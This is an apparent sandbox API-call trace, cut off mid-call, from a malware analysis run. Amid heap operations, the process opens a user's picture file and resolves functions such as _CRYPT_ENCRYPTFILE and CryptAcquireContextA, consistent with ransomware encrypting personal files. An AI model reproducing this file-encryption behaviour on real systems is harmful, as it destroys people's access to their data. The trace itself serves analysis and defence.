[0092.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0092.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.238] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0092.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0092.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca7d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0092.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0092.239] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0092.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0092.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0092.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0092.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0092.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0092.240] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\6EeiE520t8A11Pm.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\6eeie520t8a11pm.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0092.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0092.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0092.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0092.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d938 [0092.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0092.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0092.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0092.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0092.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0092.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0092.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0092.242] FreeLibrary (hLibModule=0x772d0000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.244] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.244] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0092.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.245] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0092.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d938 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0092.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0092.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0092.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0092.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0092.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0092.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca208, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0092.247] CloseHandle (hObject=0x298) returned 1 [0092.248] FreeLibrary (hLibModule=0x772d0000) returned 1 [0092.248] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0092.248] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\6EeiE520t8A11Pm.jpg", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e5d5b00, ftCreationTime.dwHighDateTime=0x1d5e47f, ftLastAccessTime.dwLowDateTime=0xa9a111f0, ftLastAccessTime.dwHighDateTime=0x1d5ed11, ftLastWriteTime.dwLowDateTime=0xa9a111f0, ftLastWriteTime.dwHighDateTime=0x1d5ed11, nFileSizeHigh=0x0, nFileSizeLow=0x14b8d, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="6EeiE520t8A11Pm.jpg", cAlternateFileName="6EEIE5~1.JPG")) returned 0x41ac280 [0092.248] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0092.248] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.248] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.248] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0092.248] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0092.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0092.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0092.249] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, 